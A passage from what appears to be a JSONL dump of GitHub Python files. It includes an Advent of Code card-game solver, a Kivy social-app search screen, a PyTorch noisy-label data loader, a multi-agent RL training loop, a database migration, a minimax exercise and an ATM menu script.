file[0]\n","repo_name":"MandragoreVR/2048","sub_path":"save.py","file_name":"save.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"33698307406","text":"from typing import Deque, List\n\n\ndef parse_decks(text: str) -> [List[int], List[int]]:\n return [list(int(x) for x in xs.splitlines()[1:]) for xs in text.split(\"\\n\\n\")]\n\n\ndef play_round_1(p1: List[int], p2: List[int]) -> (int, Deque[int]):\n while p1 and p2:\n h1, h2 = p1[0], p2[0]\n p1, p2 = p1[1:], p2[1:]\n if h1 > h2:\n p1 += [h1, h2]\n else:\n p2 += [h2, h1]\n return (0, p1) if p1 else (1, p2)\n\n\ndef play_round_2(p1: List[int], p2: List[int]) -> (int, Deque[int]):\n used = set()\n while p1 and p2:\n key = str(p1) + \"|\" + str(p2)\n if key in used:\n return 1, p2\n used.add(key)\n\n h1, h2 = p1[0], p2[0]\n p1, p2 = p1[1:], p2[1:]\n\n if len(p1) < h1 or len(p2) < h2:\n if h1 > h2:\n p1 += [h1, h2]\n else:\n p2 += [h2, h1]\n else:\n winner, _ = play_round_2(p1[:h1], p2[:h2])\n if winner == 1:\n p1 += [h1, h2]\n else:\n p2 += [h2, h1]\n return (1, p1) if len(p1) > 0 else (2, p2)\n\n\ndef calc_score(deck: List[int]) -> int:\n return sum((i + 1) * v for i, v in enumerate(reversed(deck)))\n\n\ndef solve_part_1(text: str):\n (p1, p2) = parse_decks(text)\n _, winner_deck = play_round_1(p1, p2)\n return calc_score(winner_deck)\n\n\ndef solve_part_2(text: str):\n (p1, p2) = parse_decks(text)\n _, winner_deck = play_round_2(p1, p2)\n return calc_score(winner_deck)\n\n\nif __name__ == '__main__':\n with open(\"input.txt\", \"r\") as f:\n quiz_input = f.read()\n print(\"Part 1:\", solve_part_1(quiz_input))\n print(\"Part 2:\", solve_part_2(quiz_input))\n","repo_name":"MartinSeeler/Advent-of-Code","sub_path":"2020/day22/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"85"} +{"seq_id":"70828562197","text":"#import kivy\nfrom multiprocessing import connection\nfrom kivy.app import App\nfrom functools import partial\nfrom kivy.uix.widget import Widget\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.floatlayout import FloatLayout\nfrom kivy.uix.button import Button\nfrom kivy.uix.button import ButtonBehavior\nfrom kivy.uix.label import Label\nfrom kivy.uix.image import Image\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.textinput import 
TextInput\nfrom kivy.uix.image import AsyncImage\nfrom kivy.uix.scrollview import ScrollView\nfrom kivy.core.window import Window\nfrom kivy.base import runTouchApp\nfrom kivy.properties import StringProperty\nfrom kivy.lang import Builder\nfrom kivy.uix.screenmanager import ScreenManager, Screen\nimport time\nfrom kivy.clock import Clock\nfrom kivy.uix.screenmanager import FallOutTransition\nfrom kivy.uix.screenmanager import SlideTransition\nimport kivy.utils\nimport home_screen, access_my_info\nfrom datetime import datetime\n#import pyperclip\n\nimport functions\n\nif not __name__ == \"home_screen\":\n import home_screen\n\n\nclass SearchScreen (Screen):\n def __init__(self, conn, **kwargs):\n super(SearchScreen, self).__init__(**kwargs)\n print(2)\n\n self.connection = conn\n\n self.main_all_box = BoxLayout(orientation = \"vertical\")\n self.add_widget(self.main_all_box)\n\n self.header_box = BoxLayout (size_hint = (1, 0.1))\n self.main_all_box.add_widget(self.header_box)\n\n self.logo = Button (border = (0, 0, 0, 0), size_hint = (None, None), size = ((Window.size[1] - Window.size[0] / 5) * 0.1, (Window.size[1] - Window.size[0] / 5) * 0.1), background_normal = 'images/logo.png', background_down = 'images/logo.png', on_release = self.refresh_search_screen)\n self.header_box.add_widget(self.logo)\n \n self.header_text = Label(text = \"Small brother\", size_hint = (2, 1))\n self.header_box.add_widget(self.header_text)\n \n self.header_btn = Button(border = (0, 0, 0, 0), size_hint = (None, None), size = ((Window.size[1] - Window.size[0] / 5) * 0.1, (Window.size[1] - Window.size[0] / 5) * 0.1), background_normal = 'images/settings1.png', background_down = 'images/settings2.png')\n self.header_box.add_widget(self.header_btn)\n self.header_btn.bind(on_release = self.header_btn_press)\n \n\n self.content_box = BoxLayout (size_hint = (1, 0.9), orientation = \"vertical\")\n self.main_all_box.add_widget(self.content_box)\n \n self.content_box_scroll = ScrollView ()\n self.content_box.add_widget (self.content_box_scroll) \n\n self.content_grid = GridLayout(cols = 1, size_hint_y = None)\n self.content_box_scroll.add_widget (self.content_grid)\n self.content_grid.bind(minimum_height=self.content_grid.setter('height'))\n\n #self.content_grid.add_widget(Button(text = \"a\", size_hint_y = None, height = 100))\n \n self.display_header_box = BoxLayout(size_hint_y = None, height = Window.size[1] / 8)\n self.content_grid.add_widget(self.display_header_box)\n\n self.content_in_scroll_box = BoxLayout(orientation = 'vertical', size_hint_y = None)\n self.content_grid.add_widget(self.content_in_scroll_box)\n\n self.all_flags = [['images/check_verd.png'], ['images/red_cross.png'], ['images/age18.png'], ['images/blood.png'], ['images/fist.png'], ['images/soga.png'], ['images/art.png'], ['images/discuss.png'], ['images/politic.png'], ['images/sport.png'], ['images/videogame.png'], ['images/music.png']]\n for d in range(len(self.all_flags) - 2):\n self.all_flags[d + 2].append(str(d + 2))\n for x in range (len(self.all_flags) - 2):\n self.all_flags[x + 2].append(0)\n \n #firstposts\n #current: 1 = new, 2 = search\n self.current_posts = 0 \n\n #self.new_posts_header_press(0)\n\n\n self.ground_box = BoxLayout (size_hint_y = None, height = Window.size[0] / 5)\n self.main_all_box.add_widget(self.ground_box)\n\n self.chat_btn = Button (text = (\"C\"))\n self.ground_box.add_widget(self.chat_btn)\n self.chat_btn.bind(on_release = self.press_chat_btn)\n\n self.search_label = Label (text = (\"Search\"))\n 
self.ground_box.add_widget(self.search_label)\n\n self.home_btn = Button (text = (\"H\"))\n self.ground_box.add_widget(self.home_btn)\n self.home_btn.bind(on_release = self.press_home_btn)\n\n self.make_posts_btn = Button (text = (\"P\"))\n self.ground_box.add_widget(self.make_posts_btn)\n self.make_posts_btn.bind(on_release = self.press_make_posts_btn)\n\n self.user_profile_btn = Button (text = (\"U\"))\n self.ground_box.add_widget(self.user_profile_btn)\n self.user_profile_btn.bind(on_release = self.press_user_profile_btn)\n\n print(20)\n \n\n def header_btn_press(self, instance):\n pass\n\n def flag_press(self, instance):\n flag_number = int(instance.text)\n self.all_flags[flag_number][2] = (self.all_flags[flag_number][2] + 1) % 2 \n if self.all_flags[flag_number][2] == 1:\n instance.background_normal = self.all_flags[1][0]\n elif self.all_flags[flag_number][2] == 0:\n instance.background_normal = self.all_flags[flag_number][0]\n\n def search_header_press(self, instance):\n if self.current_posts == 1:\n self.content_in_scroll_box.clear_widgets()\n\n self.display_header_box.clear_widgets()\n\n for x in range (len(self.all_flags) - 2):\n self.all_flags[x + 2][2] = 0\n\n\n self.new_posts_header_display_btn = Button(text = \"New\")\n self.display_header_box.add_widget(self.new_posts_header_display_btn)\n self.new_posts_header_display_btn.bind(on_release = self.new_posts_header_press)\n\n self.search_header_display_label = Label (text = \"Search\")\n self.display_header_box.add_widget(self.search_header_display_label)\n\n self.search_user_header_btn = Button(size_hint_y = None, height = Window.size[1] / 15 / 2, text = \"Search user:\")\n self.content_in_scroll_box.add_widget(self.search_user_header_btn)\n\n self.search_user_input = TextInput(multiline = False, size_hint_y = None, height = Window.size[1] / 15)\n self.content_in_scroll_box.add_widget(self.search_user_input)\n #self.search_user_input.bind(on_text_validate = self.search_user_def)\n\n self.search_hastags_header_btn = Button(text = \"Search hashtag:\", size_hint_y = None, height = Window.size[1] / 15 / 2)\n self.content_in_scroll_box.add_widget(self.search_hastags_header_btn)\n\n self.search_post_hastags_input = TextInput(multiline = False, size_hint_y = None, height = Window.size[1] / 15)\n self.content_in_scroll_box.add_widget(self.search_post_hastags_input)\n #self.search_post_hastags.bind(on_text_validate = self.search_hastags_def)\n \n self.flag_filter_scroll = ScrollView (size_hint_y = None, height = (Window.size[1] - Window.size[0] / 5) * 0.9 / 12)\n self.content_in_scroll_box.add_widget(self.flag_filter_scroll) \n\n self.flag_grid = GridLayout(rows = 1, size_hint_x = None, size_hint_y = None, height = (Window.size[1] - Window.size[0] / 5) * 0.9 / 12)\n self.flag_grid.bind(minimum_width = self.flag_grid.setter('width'))\n self.flag_filter_scroll.add_widget(self.flag_grid)\n \n for x in range (len(self.all_flags) - 2):\n self.flag_btn = Button(border = (0, 0, 0, 0), font_size = 1, size_hint_x = None, width = (Window.size[1] - Window.size[0] / 5) * 0.9 / 12, text = str(self.all_flags[x + 2][1]), on_release = self.flag_press, background_normal = self.all_flags[x + 2][0])\n self.all_flags[x + 2].append(self.flag_btn)\n self.flag_grid.add_widget(self.flag_btn)\n self.flag_grid.bind(minimum_width = self.flag_grid.setter('width'))\n\n self.search_btn_box = BoxLayout(size_hint_y = None, height = Window.size[1] / 6)\n self.content_in_scroll_box.add_widget(self.search_btn_box)\n\n self.search_btn = Button(on_release = 
self.search_def, border = (0, 0, 0, 0), text = \"Search\")\n self.search_btn_box.add_widget(self.search_btn)\n\n self.clear_search_btn = Button(size_hint_y = None, height = Window.size[1] / 8, on_release = self.clear_search_def, border = (0, 0, 0, 0), text = \"Clear\")\n self.content_in_scroll_box.add_widget(self.clear_search_btn)\n\n self.searched_box = BoxLayout(size_hint_y = None, height = 0, orientation = \"vertical\")\n self.content_in_scroll_box.add_widget(self.searched_box)\n\n\n self.content_in_scroll_box.height = Window.size[1] / 8 + Window.size[1] / 6 + (Window.size[1] - Window.size[0] / 5) * 0.9 / 12 + Window.size[1] * 3 / 15\n self.content_grid.bind(minimum_height=self.content_grid.setter('height'))\n self.current_posts = 2\n \n def new_posts_header_press(self, instance):\n if self.current_posts == 2:\n self.content_in_scroll_box.clear_widgets()\n\n self.display_header_box.clear_widgets()\n\n\n self.new_posts_header_display_label = Label(text = \"New\")\n self.display_header_box.add_widget(self.new_posts_header_display_label)\n \n self.search_header_display_btn = Button (text = \"Search\")\n self.display_header_box.add_widget(self.search_header_display_btn)\n self.search_header_display_btn.bind(on_release = self.search_header_press)\n\n\n self.content_in_scroll_box.height = len(self.all_newest_posts_info) * Window.size[0] / 1.61\n\n #new posts\n self.create_newest_posts()\n \n self.content_grid.bind(minimum_height=self.content_grid.setter('height'))\n self.current_posts = 1\n\n def new_posts_refresh(self, instance):\n connection = self.connection\n self.all_new_posts_info = connection.get_posts(sort_by = \"time_posted\", sort_order = \"desc\", num = 10)\n self.all_newest_posts_info = functions.order_posts_by_timestamp(self.all_new_posts_info)\n print(self.all_newest_posts_info)\n\n self.create_newest_posts()\n #create a list with users searched. 
in next def we get info from list\n\n def create_newest_posts(self):\n self.all_displayed_posts_list = []\n conn = self.connection\n my_liked_posts_id = access_my_info.get_liked_id()\n for t in range(len(self.all_newest_posts_info)):\n user_post_info = conn.get_user(self.all_newest_posts_info[t][\"user_id\"])\n actual_maybe_like = 0\n try:\n for liked in my_liked_posts_id:\n if liked == self.all_newest_posts_info[t][\"id\"]:\n actual_maybe_like = 1\n except KeyError:\n pass\n self.post_btn = functions.make_post_btn(self, self.all_newest_posts_info[t][\"user_id\"], user_post_info[\"profile_picture\"], self.all_newest_posts_info[t][\"flags\"], self.all_newest_posts_info[t][\"content\"], self.all_newest_posts_info[t][\"time_posted\"], self.all_newest_posts_info[t][\"id\"], actual_maybe_like, t)\n self.content_in_scroll_box.add_widget(self.post_btn)\n self.all_displayed_posts_list.append([self.all_newest_posts_info[t][\"id\"], self.post_btn, actual_maybe_like])\n self.content_grid.bind(minimum_height=self.content_grid.setter('height'))\n\n def refresh_search_screen(self, instance):\n if self.current_posts == 0 or self.current_posts == 2:\n self.new_posts_refresh(0)\n \n elif self.current_posts == 1:\n self.search_header_press(0)\n self.new_posts_refresh(0)\n\n def get_filter_flags(self):\n self.flag_list = \"\"\n for y in range (len(self.all_flags) - 2):\n self.flag_list = self.flag_list + str(self.all_flags[y + 2][2])\n return self.flag_list\n\n def name_press(self, order_number,instance):\n #self.go_to_user_profile(order_number)\n other_user_profile_screen = self.other_profile_screen\n other_user_profile_screen.refresh_profile_screen(instance.text)\n self.manager.transition = SlideTransition()\n self.manager.current = \"other_profile\"\n self.manager.transition.direction = \"right\"\n\n def image_press(self, order_number, instance):\n if order_number == -1:\n other_user_profile_screen = self.other_profile_screen\n other_user_profile_screen.refresh_profile_screen(self.actual_user)\n self.manager.transition = SlideTransition()\n self.manager.current = \"profile\"\n self.manager.transition.direction = \"other_profile\"\n elif order_number >= 0:\n self.go_to_user_profile(order_number)\n \n def go_to_user_profile(self, order_number):\n con = self.connection\n other_user_profile_screen = self.other_profile_screen\n post_id = self.all_displayed_posts_list[order_number][0]\n post = con.get_post(post_id)\n user = post[\"user_id\"]\n other_user_profile_screen.refresh_profile_screen(user)\n self.manager.transition = SlideTransition()\n self.manager.current = \"other_profile\"\n self.manager.transition.direction = \"right\"\n\n def content_post_press(self, order_number, instance):\n #pyperclip.copy(instance.text)\n pass\n \n def clear_search_def(self, instance):\n self.search_btn_box.clear_widgets()\n self.search_btn = Button(text = \"Search\", on_release = self.search_def, border = (0, 0, 0, 0))\n self.search_btn_box.add_widget(self.search_btn)\n\n self.search_user_input.text = \"\"\n self.search_post_hastags_input.text = \"\"\n\n for x in range (len(self.all_flags) - 2):\n self.all_flags[x + 2][2] = 0\n \n self.flag_grid.clear_widgets()\n for x in range (len(self.all_flags) - 2):\n self.flag_btn = Button(border = (0, 0, 0, 0), font_size = 1, size_hint_x = None, width = (Window.size[1] - Window.size[0] / 5) * 0.9 / 12, text = str(self.all_flags[x + 2][1]), on_release = self.flag_press, background_normal = self.all_flags[x + 2][0])\n self.all_flags[x + 2].append(self.flag_btn)\n 
self.flag_grid.add_widget(self.flag_btn)\n self.flag_grid.bind(minimum_width = self.flag_grid.setter('width'))\n\n self.searched_box.clear_widgets()\n\n self.content_in_scroll_box.height = Window.size[1] / 8 + Window.size[1] / 6 + (Window.size[1] - Window.size[0] / 5) * 0.9 / 12 + Window.size[1] * 3 / 15\n self.content_grid.bind(minimum_height=self.content_grid.setter('height'))\n\n def search_def(self, instance):\n conn = self.connection\n\n self.search_btn_box.clear_widgets()\n self.search_label_no_press = Label(text = \"Search\")\n self.search_btn_box.add_widget(self.search_label_no_press)\n #self.searched_box.clear_widgets()\n if self.search_post_hastags_input.text != \"\" or self.get_filter_flags() != \"0000000000\":\n print(1)\n searched_posts = conn.get_posts(hashtag = functions.filter_chars(self.search_post_hastags_input.text), exclude_flags = self.get_filter_flags(), num = 10)\n if searched_posts != ():\n self.all_displayed_posts_list = []\n my_liked_posts_id = access_my_info.get_liked_id()\n for t in range(len(searched_posts)):\n user_post_info = conn.get_user(searched_posts[t][\"user_id\"])\n actual_maybe_like = 0\n try:\n for liked in my_liked_posts_id:\n if liked == searched_posts[t][\"id\"]:\n actual_maybe_like = 1\n except KeyError:\n pass\n self.post_btn = functions.make_post_btn(self, searched_posts[t][\"user_id\"], user_post_info[\"profile_picture\"], searched_posts[t][\"flags\"], searched_posts[t][\"content\"], searched_posts[t][\"time_posted\"], searched_posts[t][\"id\"], actual_maybe_like, t)\n self.searched_box.add_widget(self.post_btn)\n self.all_displayed_posts_list.append([searched_posts[t][\"id\"], self.post_btn, actual_maybe_like])\n self.searched_box.height = Window.size[0]/1.61 * len(searched_posts)\n self.content_in_scroll_box.height = self.content_in_scroll_box.height + self.searched_box.height\n elif searched_posts == ():\n self.not_found_label = Label(text = \"Nothing found\", size_hint_y = None, height = Window.size[1]/8)\n self.searched_box.add_widget(self.not_found_label)\n self.searched_box.height = Window.size[1]/8\n self.content_in_scroll_box.height = self.content_in_scroll_box.height + self.searched_box.height\n elif self.search_post_hastags_input.text == \"\" and self.get_filter_flags() == \"0000000000\" and self.search_user_input.text != \"\":\n print(2)\n searched_user = conn.get_user(functions.filter_chars(self.search_user_input.text))\n print(searched_user)\n if searched_user == {}:\n self.not_found_label = Label(text = \"Nothing found\", size_hint_y = None, height = Window.size[1]/8)\n self.searched_box.add_widget(self.not_found_label)\n self.searched_box.height = Window.size[1]/8\n self.content_in_scroll_box.height = self.content_in_scroll_box.height + self.searched_box.height\n elif searched_user != {}:\n self.searched_user_box = BoxLayout(orientation = 'horizontal', size_hint_y = None, height = Window.size[1]/6)\n self.searched_box.add_widget(self.searched_user_box)\n\n self.searched_user_image_grid = functions.build_image(self, searched_user[\"profile_picture\"], -1, Window.size[1]/6)\n self.searched_user_box.add_widget(self.searched_user_image_grid)\n\n self.searched_user_name_btn = Button(text = searched_user[\"user_name\"], on_release = partial(self.name_press, 0))\n self.searched_user_box.add_widget(self.searched_user_name_btn)\n\n self.searched_box.height = Window.size[1]/6\n self.content_in_scroll_box.height = self.content_in_scroll_box.height + self.searched_box.height\n\n self.actual_user = searched_user[\"user_name\"]\n\n 
self.content_grid.bind(minimum_height=self.content_grid.setter('height'))\n\n def like_press(self, order_number, instance):\n num = self.all_displayed_posts_list[order_number][2]\n num = (num + 1) % 2\n if num == 1:\n instance.background_normal = 'images/heart2.png'\n access_my_info.add_or_remove_liked_post(self.all_displayed_posts_list[order_number][0], 1)\n if num == 0:\n instance.background_normal = 'images/heart.png'\n access_my_info.add_or_remove_liked_post(self.all_displayed_posts_list[order_number][0], 0)\n self.all_displayed_posts_list[order_number][2] = num\n\n def press_chat_btn(self, instance):\n self.manager.transition = SlideTransition()\n self.manager.current = \"chat\"\n self.manager.transition.direction = \"right\"\n \n #def press_search_btn(self, instance):\n # pass\n\n def press_home_btn(self, instance):\n #home_screen = self.home_screen\n #home_screen.get_my_posts(home_screen)\n self.manager.transition = SlideTransition()\n self.manager.current = \"main\"\n self.manager.transition.direction = \"left\"\n\n def press_make_posts_btn(self, instance):\n self.manager.transition = SlideTransition()\n self.manager.current = \"create\"\n self.manager.transition.direction = \"left\"\n\n def press_user_profile_btn(self, instance):\n #profile_screen = self.profile_screen\n #profile_screen.refresh_profile_screen(profile_screen)\n self.manager.transition = SlideTransition()\n self.manager.current = \"profile\"\n self.manager.transition.direction = \"left\"\n \n def add_screens(self, home_screen, profile_screen, other_profile_screen):\n self.home_screen = home_screen\n self.profile_screen = profile_screen\n self.other_profile_screen = other_profile_screen\n","repo_name":"Feluk6174/TdR","sub_path":"gui_1/new_gui/search_screen.py","file_name":"search_screen.py","file_ext":"py","file_size_in_byte":20220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"13907867117","text":"import torch\nimport numpy as np\nimport random\nfrom scipy.io import loadmat\nfrom sklearn import preprocessing\nfrom torch.utils.data import TensorDataset, DataLoader\n\ndef feature_normalize(data):\n '''\n Normalize features by MinMaxScaler.\n :param data: unnormalized features \n :return data: normalized features\n '''\n scaler = preprocessing.MinMaxScaler(feature_range=(-1.0, 1.0)).fit(data)\n data = scaler.transform(data)\n\n return data\n\ndef generate_noisy_labels(labels):\n\n N, C = labels.shape\n\n alpha = []\n for i in range(C):\n alpha.append(round(random.uniform(0.5, 0.9), 1))\n\n alpha = np.array(alpha)\n alpha_mat = np.tile(alpha, (N, 1))\n rand_mat = np.random.rand(N, C)\n \n\n mask = np.zeros((N, C), dtype=np.float)\n mask[labels!=1] = rand_mat[labels!=1] < alpha_mat[labels!=1]\n noisy_labels = labels.clone()\n noisy_labels[mask==1] = -noisy_labels[mask==1]\n\n return noisy_labels.numpy(), labels.numpy()\n\n# def get_loader(dataname, batch_size, meta_size=50, prec=0.8):\ndef get_loader(dataname,batch_size,cv_num,p_noise,p_true,meta_size=50):\n #環境によって変える。kind_of_dataのディレクトリ\n data_path = f\"/content/drive/MyDrive/Colab Notebooks/new_data2/\" + dataname + \"/\"\n features = np.loadtxt(data_path+\"data.csv\", delimiter=',')\n labels = np.loadtxt(data_path+\"target.csv\", delimiter=',',dtype = float)\n if dataname in ['mirflickr', 'music_emotion', 'music_style','YeastBP']:\n plabels = np.loadtxt(data_path+\"cand/0.csv\", delimiter=',',dtype = float)\n else:\n plabels = np.loadtxt(data_path+\"cand/\"+str(p_noise)+\".csv\", delimiter=',',dtype = 
float)\n cv_inds = np.loadtxt(data_path+\"index/5-cv.csv\",delimiter=',',dtype = int)-1\n\n features_num = features.shape[1]\n labels_num = labels.shape[1]\n\n #全体の特徴をtensorに変換\n features = torch.tensor(features, dtype=torch.float)\n labels = torch.tensor(labels, dtype=torch.float)\n plabels = torch.tensor(plabels, dtype=torch.float)\n\n zeros = torch.zeros_like(labels)\n labels = torch.where(labels == -1, zeros, labels)\n plabels = torch.where(plabels == -1, zeros, plabels)\n\n #訓練とテストに分割(自分は5分割交差検証)\n # split training into train and test set\n \"\"\"n = len(features)\n train_size = int(n * prec)\"\"\"\n \n #trainとtestのインデックス(自分はcv_inds)\n \"\"\"indices = torch.randperm(n)\n train_idxs = indices[:train_size]\n test_idxs = indices[train_size:]\"\"\"\n index = np.where(cv_inds!=cv_num)\n index = np.ravel(index[0])\n train_idxs = torch.tensor(index)\n index = np.where(cv_inds==cv_num)\n index = np.ravel(index[0])\n test_idxs = torch.tensor(index)\n\n #上で指定したインデックスでtrainとtestに分ける \n train_features = torch.index_select(features, 0, train_idxs)\n train_labels = torch.index_select(labels, 0, train_idxs)\n plabels = torch.index_select(plabels, 0, train_idxs)\n\n clean_features = train_features.clone()\n clean_labels = train_labels.clone()\n\n noisy_features = train_features.clone()\n noisy_labels = plabels.clone()\n\n test_features = torch.index_select(features, 0, test_idxs)\n test_labels = torch.index_select(labels, 0, test_idxs)\n\n #検証集合を作る\n # select a clean batch from training set\n n = len(train_features)\n # meta_size = batch_size\n indices = torch.randperm(n)\n\n meta_size = int(n * p_true / 100)\n\n meta_idxs = indices[:meta_size]\n train_idxs = indices[meta_size:]\n\n meta_features = torch.index_select(train_features, 0, meta_idxs)\n meta_labels = torch.index_select(train_labels, 0, meta_idxs)\n\n train_features = torch.index_select(train_features, 0, train_idxs)\n train_labels = torch.index_select(plabels, 0, train_idxs)\n\n train_dataset = TensorDataset(train_features, train_labels)\n test_dataset = TensorDataset(test_features, test_labels)\n meta_dataset = TensorDataset(meta_features, meta_labels)\n clean_dataset = TensorDataset(clean_features, clean_labels)\n noisy_dataset = TensorDataset(noisy_features, noisy_labels)\n\n train_loader = DataLoader(dataset=train_dataset, batch_size=batch_size, shuffle=True)\n test_loader = DataLoader(dataset=test_dataset, batch_size=test_features.size()[0], shuffle=False)\n meta_loader = DataLoader(dataset=meta_dataset, batch_size=batch_size, shuffle=True)\n clean_loader = DataLoader(dataset=clean_dataset, batch_size=batch_size, shuffle=True)\n noisy_loader = DataLoader(dataset=noisy_dataset, batch_size=batch_size, shuffle=True)\n\n return train_loader, test_loader, meta_loader, clean_loader, noisy_loader, features_num, labels_num","repo_name":"HaruhiMizuguchi/PMLVD_expansion","sub_path":"function/PML-MD/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":4565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"14447279462","text":"import gym\n\nimport os,sys\nsys.path.append(os.path.abspath(os.getcwd()))\n\nimport baselines.gpg.gym_formation.gym_flock\nimport numpy as np\nimport torch.optim as optim\n\nimport torch\nimport matplotlib.pyplot as plt\n\nfrom baselines.gpg.rl_formation.make_g import build_graph\nfrom baselines.gpg.rl_formation.policy import Net\nfrom baselines.gpg.rl_formation.make_g import build_graph\nfrom baselines.gpg.rl_formation.utils import 
select_action, update_policy\n\nimport os\nimport datetime\n\npolicy = Net()\noptimizer = optim.Adam(policy.parameters(), lr=1e-3)\nenv = gym.make('FormationFlying-v3')\n\nif not os.path.exists('./logs'):\n\tos.makedirs('./logs')\n\nfilename = str(datetime.datetime.now())+str('_%dagents_fixed_fcnpolicy'%env.n_agents)\nfilename = filename+str('.pt')\ntorch.save(policy.state_dict(),'./logs/%s'%filename)\n\ndef main(episodes):\n\trunning_reward = 10\n\tplotting_rew = []\n\n\tfor episode in range(episodes):\n\t\treward_over_eps = []\n\t\tstate = env.reset() # Reset environment and record the starting state\n\t\tg = build_graph(env)\n\t\tdone = False\n\n\t\tfor time in range(200):\n\n\t\t\t#if episode%50==0:\n\t\t\t#\tenv.render()\n\t\t\t#g = build_graph(env)\n\t\t\taction = select_action(state,g,policy)\n\n\t\t\taction = action.numpy()\t# shape [num_agents, action_dim]\n\t\t\taction = np.reshape(action,[-1])\n\n\t\t\t# Step through environment using chosen action\n\t\t\taction = np.clip(action,-env.max_accel,env.max_accel)\n\n\t\t\tstate, reward, done, _ = env.step(action)\n\t\t\t# state.shape = [num_agents, state_dim]\n\n\t\t\treward_over_eps.append(reward)\n\t\t\t# Save reward\n\t\t\tpolicy.reward_episode.append(reward)\n\t\t\tif done:\n\t\t\t\tbreak\n\n\t\t# Used to determine when the environment is solved.\n\t\trunning_reward = (running_reward * 0.99) + (time * 0.01)\n\n\t\tupdate_policy(policy,optimizer)\n\n\t\tif episode % 50 == 0:\n\t\t\tprint(f'Episode {episode}\\t ' \\\n\t\t\t\tf'Last length: {time:5d}\\t ' \\\n\t\t\t\tf'Average running reward: {running_reward:.2f}\\t ' \\\n\t\t\t\tf'Average reward over episode: {np.mean(reward_over_eps):.2f}')\n\n\t\tif episode % 5000 == 0 :\n\t\t\ttorch.save(policy.state_dict(),'./logs/%s'%filename)\n\n\n\t\tplotting_rew.append(np.mean(reward_over_eps))\n\tnp.savetxt('Relative_Goal_Reaching_for_%d_agents_rs_rg.txt' %(env.n_agents), plotting_rew)\n\tfig = plt.figure()\n\tx = np.linspace(0,len(plotting_rew),len(plotting_rew))\n\tplt.plot(x,plotting_rew)\n\tplt.savefig('Relative_Goal_Reaching_for_%d_agents_rs_rg.png' %(env.n_agents))\n\tplt.show()\n\n\nepisodes = 50000\nmain(episodes)","repo_name":"nsidn98/InforMARL","sub_path":"baselines/gpg/rl_formation/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2405,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"85"} +{"seq_id":"19821778238","text":"# pylint: skip-file\n\"\"\"us_mi_incarceration_admission_reasons\n\nRevision ID: d449b1d3714e\nRevises: fd946cbe3966\nCreate Date: 2022-10-05 14:53:59.777758\n\n\"\"\"\nimport sqlalchemy as sa\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"d449b1d3714e\"\ndown_revision = \"8c74c471901a\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n op.execute(\n \"\"\"\n UPDATE state_incarceration_period\n SET admission_reason = 'REVOCATION'\n WHERE admission_reason_raw_text in ('11', '12', '14', '15')\n AND state_code = 'US_MI'\n \"\"\"\n )\n\n\ndef downgrade() -> None:\n op.execute(\n \"\"\"\n UPDATE state_incarceration_period\n SET admission_reason = 'NEW_ADMISSION'\n WHERE admission_reason_raw_text in ('11', '12', '14', '15')\n AND state_code = 'US_MI'\n \"\"\"\n 
)\n","repo_name":"Recidiviz/pulse-data","sub_path":"recidiviz/persistence/database/migrations/state/versions/2022_10_05_1453_d449b1d3714e_us_mi_incarceration_admission_reasons.py","file_name":"2022_10_05_1453_d449b1d3714e_us_mi_incarceration_admission_reasons.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"85"} +{"seq_id":"5988498970","text":"import random\nmy_id = \"20101344\"\nif my_id[3] == 0:\n amountOfShuffle = 8\nmini = int(my_id[4])\nwin = 44 \nmaxi = int(win*1.5)\n\n\n\ndef minimax(depth, nodeIndex, maximizingPlayer,\n\t\t\tvalues, alpha, beta):\n\n\t# Terminating condition. i.e\n\t# leaf node is reached\n\tif depth == 3:\n\t\treturn values[nodeIndex]\n\n\tif maximizingPlayer is False:\n\t\tans = 1000000000000000000000000000000000000\n\t\tfor i in range(2):\n\t\t\n\t\t\tval = minimax(depth + 1, nodeIndex * 2 + i,\n\t\t\t\t\t\t\tTrue, values, alpha, beta)\n\t\t\tans = min(ans, val)\n\t\t\tbeta = min(beta, ans)\n\n\t\t\t# Alpha Beta Pruning\n\t\t\tif beta <= alpha:\n\t\t\t\tbreak\n\t\t\n\t\treturn ans\n\t\n\telse:\n\t\tans = -1000000000000000000000000000000000000\n\n\t\t# Recur for left and right children\n\t\tfor i in range(2):\n\t\t\t\n\t\t\tval = minimax(depth + 1, nodeIndex * 2 + i,\n\t\t\t\t\t\tFalse, values, alpha, beta)\n\t\t\tans = max(ans, val)\n\t\t\talpha = max(alpha, ans)\n\n\t\t\t# Alpha Beta Pruning\n\t\t\tif beta <= alpha:\n\t\t\t\tbreak\n\t\t\n\t\treturn ans\n\n\t\n\n#eikhane change korbi, eigula shob output er.. #min = minimum num, max = maximum number, win= joto lagbey jitar jonne, shuffle_no = 8, 2nd tay lagbey\n\nprint(\"The optimal value is :\", minimax(0, 0, True, random.sample(range(mini, maxi), 8), -1000000000000000000000000000000000000, 1000000000000000000000000000000000000))\n\t\n\n","repo_name":"ShakChunni/CSE_lab","sub_path":"CSE422(AI)/scratch.py","file_name":"scratch.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"44241084528","text":"import time \n\nprint(\"\\n ==========ATM MACHINE of MSCETI ===============\")\nprint(\"1. Check Balance \")\nprint(\"2. Withdraw Balance \")\nprint(\"3. Deposit Balance \")\nprint(\"4. Exit \")\n\nbalance = 10000\nwhile True:\n user_data = int(input(\"Enter Your choice (1/2/3/4/) \"))\n if user_data == 1:\n print(f\"Your Current Balance is {balance}\")\n time.sleep(2)\n elif user_data ==2:\n amount = 